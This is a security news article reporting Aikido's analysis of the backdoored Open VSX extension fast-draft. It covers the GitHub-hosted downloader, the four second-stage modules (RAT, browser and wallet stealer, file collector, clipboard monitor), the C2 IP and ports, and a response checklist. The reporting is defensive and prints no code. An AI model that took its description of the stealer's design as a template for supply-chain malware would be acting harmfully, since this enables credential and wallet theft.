Backdoored Open VSX extension used GitHub-hosted downloader to install RAT and stealer
6 min. read 
Published on
A compromised Open VSX extension called fast-draft quietly delivered a remote access trojan and an infostealer to developer machines by downloading second-stage payloads from GitHub. Security firm Aikido says several fast-draft releases under the KhangNghiem publisher account contained malicious code, while other nearby versions appeared clean, which points to a likely account or release pipeline compromise rather than an obviously rogue project.
The affected releases identified by Aikido were 0.10.89, 0.10.105, 0.10.106, and 0.10.112. As of March 17, 2026, Aikido said the Open VSX API listed 0.10.135 as the latest version and showed 26,594 total downloads for the extension, which gives the campaign a meaningful potential reach across developer systems.
According to Aikido, the malicious versions contacted a GitHub repository tied to BlokTrooper and piped platform-specific shell scripts straight into the system shell. Those scripts then fetched and ran a larger second-stage package that deployed multiple attack modules at once.
The wider concern goes beyond one extension. Open VSX is the Eclipse Foundation-backed alternative to the Visual Studio Marketplace, and editor extensions often run with broad access to local files, developer secrets, terminals, and network resources. That makes extension ecosystems a high-value target for supply chain attacks.
What happened
Aikido said it found the compromise during a manual version-by-version review of the fast-draft release line. The company disclosed the issue to the maintainer on March 12, 2026 through GitHub issue #565, but said the report had received no response at the time the research was published.
The release pattern looked unusual. Aikido reported that versions 0.10.88, 0.10.111, and 0.10.135 did not show the same malicious behavior, while the four flagged versions did. That alternating pattern suggests intermittent access to the publisher account or release token, not a simple one-time swap of the whole project. This is Aikido’s assessment, not a confirmed attribution from Open VSX or the maintainer.
How the malware chain worked
Aikido says the malicious extension reached out to raw.githubusercontent.com/BlokTrooper/extension to fetch platform-specific scripts. Instead of storing the full payload inside the extension package, the attacker used GitHub as a delivery point for the next stage, which can make suspicious behavior harder to spot during casual review.
Once the downloader ran, it pulled a ZIP archive, unpacked it into a temporary directory, and launched four detached Node.js processes. Aikido says those processes split the workload across separate modules for remote control, browser and wallet theft, file collection, and clipboard surveillance.
One module reportedly connected to command-and-control infrastructure at 195.201.104.53 over port 6931 using Socket.IO, which gave the operator live access to the system. Aikido says that capability included mouse and keyboard control, screenshots, and clipboard reads.
A second module targeted browser profiles across Chrome, Edge, Brave, and Opera on Windows, macOS, and Linux. Aikido says it also targeted 25 cryptocurrency wallet extensions, including MetaMask, Phantom, Coinbase Wallet, and Trust Wallet, then sent the collected data to port 6936 on the same server.
A third module searched the home directory for documents, environment files, private keys, shell history, and source code. Aikido says it deliberately skipped folders such as .cursor, .claude, and .windsurf, which suggests the operator made choices about where to search and what to avoid on AI-assisted developer machines.
The fourth module watched the clipboard and exfiltrated captured content, which could include passwords, API keys, and seed phrases. Aikido linked that traffic to /api/service/makelog on the command-and-control server.
Malicious and clean versions
| Version | Status reported by Aikido |
|---|---|
| 0.10.88 | Clean |
| 0.10.89 | Malicious |
| 0.10.105 | Malicious |
| 0.10.106 | Malicious |
| 0.10.111 | Clean |
| 0.10.112 | Malicious |
| 0.10.135 | Clean at time of review |
Source: Aikido’s published analysis of the fast-draft extension.
Why developers should care
A malicious editor extension can reach far beyond one app. On many developer systems, a compromised extension can access local source code, browser sessions, terminal history, cloud credentials, wallet data, and clipboard contents. In practice, that means one backdoored add-on can become a route to code theft, financial loss, account takeover, and follow-on attacks inside a company. This risk model follows directly from Aikido’s technical findings on what the second stage tried to collect.
The case also shows why version-level review matters. A clean latest version does not always mean the extension was safe last week. Aikido’s findings suggest users who installed the wrong release during the malicious window may still need incident response even if the current listing no longer shows obvious malicious behavior.
What affected users should do now
Developers should check whether they ever installed fast-draft versions 0.10.89, 0.10.105, 0.10.106, or 0.10.112. Aikido recommends immediate removal and says any system that ran those builds should be treated as potentially compromised.
Teams should also rotate stored credentials, API keys, browser-saved passwords, and cryptocurrency wallet secrets that may have been present on affected machines. Network defenders should block or investigate traffic to 195.201.104.53 on ports 6931, 6936, and 6939, and review logs for requests to raw.githubusercontent.com/BlokTrooper.
Immediate response checklist
- Check installed or previously installed
fast-draftversions against the known malicious list. - Remove the extension from affected environments.
- Reimage or deeply investigate systems that executed the malicious versions. This is a security best-practice inference based on the reported RAT and stealer behavior.
- Rotate passwords, tokens, SSH keys, API keys, and wallet-related secrets.
- Hunt for traffic to the reported GitHub path and C2 IP and ports.
- Review source code repositories and developer accounts for signs of follow-on access. This is a reasonable defensive step based on the categories of data Aikido says were targeted.
FAQ
Open VSX is an open-source extension registry operated as an Eclipse Foundation project and serves as an alternative marketplace for compatible code editors.
fast-draft versions were malicious? Aikido identified 0.10.89, 0.10.105, 0.10.106, and 0.10.112 as malicious.
fast-draft infected? No. Aikido says some nearby releases, including 0.10.88, 0.10.111, and 0.10.135, did not show the malicious behavior seen in the compromised versions.
According to Aikido, the second stage included a RAT, a browser and crypto-wallet stealer, a file exfiltration module, and a clipboard monitor.
Aikido says the extension downloaded scripts and payloads from a GitHub-hosted repository controlled by the attacker. Using GitHub can help malicious traffic blend in with normal developer activity. The first part is sourced; the second is a security inference.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages